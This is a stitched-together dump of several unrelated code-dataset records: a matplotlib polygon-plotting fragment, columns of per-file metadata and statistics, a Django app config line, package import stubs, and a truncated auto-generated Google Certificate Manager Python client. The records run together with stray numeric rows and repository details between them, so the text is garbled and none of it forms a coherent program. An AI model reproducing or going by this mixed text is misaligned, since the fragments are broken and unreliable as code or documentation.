offs = np.ones([4,len(cnts),2])
offs[0,:,:] = [-dr/2,-dr/2]
offs[1,:,:] = [dr/2,-dr/2]
offs[2,:,:] = [dr/2,dr/2]
offs[3,:,:] = [-dr/2,dr/2]
vrts_fluid = cnts + offs
vrts_fluid = np.swapaxes(vrts_fluid, 0, 1)
rgb = f_color_map(partProp)
# create the figure
fig = plt.figure(PARTFIG)
ax_list = fig.axes#check if the figure is already open else get back the subplot axes
if len(ax_list)<1:
ax = fig.subplots()
else:
ax = ax_list[0]
coll = PolyCollection(vrts_fluid,array=None,facecolors=rgb,edgecolor='black',linewidths=0.1)
ax.add_collection(coll)
ax.set_aspect('equal')
plt.xlabel('$x$(m)',fontsize=18)
plt.ylabel('$y$(m)',fontsize=18)
plt.xlim(xMin,xMax)
plt.ylim(yMin,yMax)
plt.tight_layout()
ax = plt.gca()
ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
ax.xaxis.set_major_locator(plt.MaxNLocator(5))
ax.yaxis.set_major_locator(plt.MaxNLocator(5))
cax, _ = cbar.make_axes(ax)
cb2 = cbar.ColorbarBase(cax, cmap=cmap,norm=normal)
cb2.set_label(nameBar,fontsize=18)
ax = plt.gca()
ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
##fig.savefig(figname,bbox_inches='tight')
plt.show(block=False)
plt.draw()
| 34.09589
| 120
| 0.608779
| 1,435
| 9,956
| 4.16446
| 0.150523
| 0.024096
| 0.02008
| 0.024096
| 0.792336
| 0.789993
| 0.784806
| 0.755355
| 0.755355
| 0.755355
| 0
| 0.026749
| 0.200181
| 9,956
| 291
| 121
| 34.213058
| 0.723722
| 0.206408
| 0
| 0.78673
| 0
| 0
| 0.040373
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037915
| false
| 0
| 0.047393
| 0
| 0.104265
| 0.009479
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
eb61d5fdfb12e586a386651c6c1770f6553c5461
| 89
|
py
|
Python
|
docsie_universal_importer/providers/dropbox/__init__.py
|
Zarif99/test-universal
|
062972ed64d9f048de702ab1edf4025cffca2abb
|
[
"BSD-3-Clause"
] | null | null | null |
docsie_universal_importer/providers/dropbox/__init__.py
|
Zarif99/test-universal
|
062972ed64d9f048de702ab1edf4025cffca2abb
|
[
"BSD-3-Clause"
] | 16
|
2021-06-16T15:00:41.000Z
|
2021-06-30T11:57:15.000Z
|
docsie_universal_importer/providers/dropbox/__init__.py
|
Zarif99/test-universal
|
062972ed64d9f048de702ab1edf4025cffca2abb
|
[
"BSD-3-Clause"
] | 1
|
2021-11-17T19:24:45.000Z
|
2021-11-17T19:24:45.000Z
|
default_app_config = 'docsie_universal_importer.providers.dropbox.apps.DropboxAppConfig'
| 44.5
| 88
| 0.88764
| 10
| 89
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033708
| 89
| 1
| 89
| 89
| 0.872093
| 0
| 0
| 0
| 0
| 0
| 0.730337
| 0.730337
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ebcda36ca8928425705f7e76b2bc429a4f48e6da
| 162
|
py
|
Python
|
src/analysis/__init__.py
|
gchhablani/DRIFT
|
8d748998b695489a40ff732a974e4b1f915bab34
|
[
"MIT"
] | 90
|
2021-07-01T15:42:57.000Z
|
2021-12-06T04:57:59.000Z
|
src/analysis/__init__.py
|
gchhablani/DRIFT
|
8d748998b695489a40ff732a974e4b1f915bab34
|
[
"MIT"
] | 8
|
2021-07-02T12:41:13.000Z
|
2021-08-08T17:59:30.000Z
|
src/analysis/__init__.py
|
gchhablani/DRIFT
|
8d748998b695489a40ff732a974e4b1f915bab34
|
[
"MIT"
] | 7
|
2021-07-01T13:08:14.000Z
|
2021-08-29T05:29:09.000Z
|
from .leap2trend import *
from .semantic_drift import *
from .similarity_acc_matrix import *
from .topic_extraction_lda import *
from .tracking_clusters import *
| 27
| 36
| 0.814815
| 21
| 162
| 6
| 0.619048
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007042
| 0.123457
| 162
| 5
| 37
| 32.4
| 0.880282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ccf8da78fff1e13984fb722a82c6b833a49cb466
| 66
|
py
|
Python
|
app.py
|
mjcarleb/pet_blog
|
9db1914b2aa7af9d258ca2f2bd41b260b238c256
|
[
"MIT"
] | null | null | null |
app.py
|
mjcarleb/pet_blog
|
9db1914b2aa7af9d258ca2f2bd41b260b238c256
|
[
"MIT"
] | null | null | null |
app.py
|
mjcarleb/pet_blog
|
9db1914b2aa7af9d258ca2f2bd41b260b238c256
|
[
"MIT"
] | null | null | null |
from puppycompanyblog import app
def create_app():
return app
| 16.5
| 32
| 0.772727
| 9
| 66
| 5.555556
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 66
| 4
| 33
| 16.5
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 6
|
690729a8e84ab99b40515f35cca05f76af37aa2f
| 72
|
py
|
Python
|
tests/data/format/no_changes/multi_line_variables.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 4
|
2022-01-02T22:50:59.000Z
|
2022-02-09T09:04:37.000Z
|
tests/data/format/no_changes/multi_line_variables.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 80
|
2022-01-02T09:02:50.000Z
|
2022-03-30T13:34:10.000Z
|
tests/data/format/no_changes/multi_line_variables.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 2
|
2022-01-02T11:58:29.000Z
|
2022-01-04T18:53:29.000Z
|
var = """A multi-line
docstring"""
var = """A multi-line
docstring
"""
| 10.285714
| 21
| 0.611111
| 10
| 72
| 4.4
| 0.5
| 0.181818
| 0.409091
| 0.590909
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 72
| 6
| 22
| 12
| 0.733333
| 0
| 0
| 0.4
| 0
| 0
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
69682a67df863cb3aa2e163a6aa3fb36251c2dbe
| 32
|
py
|
Python
|
queso/cli/__init__.py
|
bocadilloproject/boca
|
b477ac4de5102ce56798b95d77f4eae3e4f08bb6
|
[
"MIT"
] | 4
|
2019-01-20T14:20:18.000Z
|
2019-02-13T02:36:00.000Z
|
queso/cli/__init__.py
|
bocadilloproject/queso
|
b477ac4de5102ce56798b95d77f4eae3e4f08bb6
|
[
"MIT"
] | 2
|
2019-03-09T16:55:26.000Z
|
2019-04-20T09:42:09.000Z
|
queso/cli/__init__.py
|
bocadilloproject/queso
|
b477ac4de5102ce56798b95d77f4eae3e4f08bb6
|
[
"MIT"
] | null | null | null |
from .factory import create_cli
| 16
| 31
| 0.84375
| 5
| 32
| 5.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
15daad6da8b567efe639be6c415a5291c7ac5159
| 119,544
|
py
|
Python
|
google/cloud/certificate_manager_v1/services/certificate_manager/client.py
|
renovate-bot/python-certificatemanager
|
8e93056d8ccbd6f2fe6f5f8346ad28c104a8b688
|
[
"Apache-2.0"
] | 1
|
2022-02-22T03:49:14.000Z
|
2022-02-22T03:49:14.000Z
|
google/cloud/certificate_manager_v1/services/certificate_manager/client.py
|
renovate-bot/python-certificatemanager
|
8e93056d8ccbd6f2fe6f5f8346ad28c104a8b688
|
[
"Apache-2.0"
] | 9
|
2022-02-16T16:39:24.000Z
|
2022-03-30T13:17:14.000Z
|
google/cloud/certificate_manager_v1/services/certificate_manager/client.py
|
renovate-bot/python-certificatemanager
|
8e93056d8ccbd6f2fe6f5f8346ad28c104a8b688
|
[
"Apache-2.0"
] | 1
|
2022-02-16T15:27:03.000Z
|
2022-02-16T15:27:03.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Mapping, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.oauth2 import service_account # type: ignore
import pkg_resources
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.cloud.certificate_manager_v1.services.certificate_manager import pagers
from google.cloud.certificate_manager_v1.types import certificate_manager
from .transports.base import DEFAULT_CLIENT_INFO, CertificateManagerTransport
from .transports.grpc import CertificateManagerGrpcTransport
from .transports.grpc_asyncio import CertificateManagerGrpcAsyncIOTransport
class CertificateManagerClientMeta(type):
"""Metaclass for the CertificateManager client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[CertificateManagerTransport]]
_transport_registry["grpc"] = CertificateManagerGrpcTransport
_transport_registry["grpc_asyncio"] = CertificateManagerGrpcAsyncIOTransport
def get_transport_class(
cls,
label: str = None,
) -> Type[CertificateManagerTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class CertificateManagerClient(metaclass=CertificateManagerClientMeta):
"""API Overview
Certificates Manager API allows customers to see and manage all
their TLS certificates.
Certificates Manager API service provides methods to manage
certificates, group them into collections, and create serving
configuration that can be easily applied to other Cloud resources
e.g. Target Proxies.
Data Model
The Certificates Manager service exposes the following resources:
- ``Certificate`` which describes a single TLS certificate.
- ``CertificateMap`` which describes a collection of certificates
that can be attached to a target resource.
- ``CertificateMapEntry`` which describes a single configuration
entry that consists of a SNI and a group of certificates. It's a
subresource of CertificateMap.
Certificate, CertificateMap and CertificateMapEntry IDs have to
match "^[a-z0-9-]{1,63}$" regexp, which means that
- only lower case letters, digits, and hyphen are allowed
- length of the resource ID has to be in [1,63] range.
Provides methods to manage Cloud Certificate Manager entities.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "certificatemanager.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CertificateManagerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CertificateManagerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> CertificateManagerTransport:
"""Returns the transport used by the client instance.
Returns:
CertificateManagerTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def certificate_path(
project: str,
location: str,
certificate: str,
) -> str:
"""Returns a fully-qualified certificate string."""
return (
"projects/{project}/locations/{location}/certificates/{certificate}".format(
project=project,
location=location,
certificate=certificate,
)
)
@staticmethod
def parse_certificate_path(path: str) -> Dict[str, str]:
"""Parses a certificate path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/certificates/(?P<certificate>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def certificate_map_path(
project: str,
location: str,
certificate_map: str,
) -> str:
"""Returns a fully-qualified certificate_map string."""
return "projects/{project}/locations/{location}/certificateMaps/{certificate_map}".format(
project=project,
location=location,
certificate_map=certificate_map,
)
@staticmethod
def parse_certificate_map_path(path: str) -> Dict[str, str]:
"""Parses a certificate_map path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/certificateMaps/(?P<certificate_map>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def certificate_map_entry_path(
project: str,
location: str,
certificate_map: str,
certificate_map_entry: str,
) -> str:
"""Returns a fully-qualified certificate_map_entry string."""
return "projects/{project}/locations/{location}/certificateMaps/{certificate_map}/certificateMapEntries/{certificate_map_entry}".format(
project=project,
location=location,
certificate_map=certificate_map,
certificate_map_entry=certificate_map_entry,
)
@staticmethod
def parse_certificate_map_entry_path(path: str) -> Dict[str, str]:
"""Parses a certificate_map_entry path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/certificateMaps/(?P<certificate_map>.+?)/certificateMapEntries/(?P<certificate_map_entry>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def dns_authorization_path(
project: str,
location: str,
dns_authorization: str,
) -> str:
"""Returns a fully-qualified dns_authorization string."""
return "projects/{project}/locations/{location}/dnsAuthorizations/{dns_authorization}".format(
project=project,
location=location,
dns_authorization=dns_authorization,
)
@staticmethod
def parse_dns_authorization_path(path: str) -> Dict[str, str]:
"""Parses a dns_authorization path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/dnsAuthorizations/(?P<dns_authorization>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def target_https_proxies_path(
project: str,
location: str,
target_https_proxy: str,
) -> str:
"""Returns a fully-qualified target_https_proxies string."""
return "projects/{project}/locations/{location}/targetHttpsProxies/{target_https_proxy}".format(
project=project,
location=location,
target_https_proxy=target_https_proxy,
)
@staticmethod
def parse_target_https_proxies_path(path: str) -> Dict[str, str]:
"""Parses a target_https_proxies path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/targetHttpsProxies/(?P<target_https_proxy>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def target_ssl_proxies_path(
project: str,
location: str,
target_ssl_proxy: str,
) -> str:
"""Returns a fully-qualified target_ssl_proxies string."""
return "projects/{project}/locations/{location}/targetSslProxies/{target_ssl_proxy}".format(
project=project,
location=location,
target_ssl_proxy=target_ssl_proxy,
)
@staticmethod
def parse_target_ssl_proxies_path(path: str) -> Dict[str, str]:
"""Parses a target_ssl_proxies path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/targetSslProxies/(?P<target_ssl_proxy>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(
billing_account: str,
) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(
folder: str,
) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(
folder=folder,
)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(
organization: str,
) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(
organization=organization,
)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(
project: str,
) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(
project=project,
)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(
project: str,
location: str,
) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project,
location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, CertificateManagerTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the certificate manager client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, CertificateManagerTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, CertificateManagerTransport):
# transport is a CertificateManagerTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
def list_certificates(
self,
request: Union[certificate_manager.ListCertificatesRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCertificatesPager:
r"""Lists Certificates in a given project and location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_certificates():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListCertificatesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_certificates(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListCertificatesRequest, dict]):
The request object. Request for the `ListCertificates`
method.
parent (str):
Required. The project and location from which the
certificate should be listed, specified in the format
``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListCertificatesPager:
Response for the ListCertificates method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListCertificatesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.ListCertificatesRequest):
request = certificate_manager.ListCertificatesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_certificates]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCertificatesPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_certificate(
self,
request: Union[certificate_manager.GetCertificateRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.Certificate:
r"""Gets details of a single Certificate.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetCertificateRequest(
name="name_value",
)
# Make the request
response = client.get_certificate(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetCertificateRequest, dict]):
The request object. Request for the `GetCertificate`
method.
name (str):
Required. A name of the certificate to describe. Must be
in the format ``projects/*/locations/*/certificates/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.Certificate:
Defines TLS certificate.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetCertificateRequest):
request = certificate_manager.GetCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
